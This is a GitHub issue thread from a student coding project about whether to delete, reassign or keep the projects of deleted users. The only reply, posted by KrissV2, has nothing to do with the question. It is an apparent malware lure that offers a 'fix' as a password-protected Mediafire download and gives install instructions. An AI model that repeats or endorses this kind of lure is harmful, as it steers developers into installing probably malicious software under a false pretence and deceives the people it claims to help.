### ISSUE TITLE
what to do with deleted user's project

### ISSUE THREAD

**Issue by Pouish85** [WildCodeSchool/2023-11-wns-bleu-g1#173]
When a user is deleted, their projects are not deleted. We need to decide what to do with them. We have three options:

1.     Delete them at the same time as the user.
2.     Change the project's user to "deleted user" and keep them in the database.
3.     Do nothing (but in this case, if the user deletes their account and remakes it with the same email/username, the projects will appear in their profile page but they can't run them because the IDs are not the same).

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
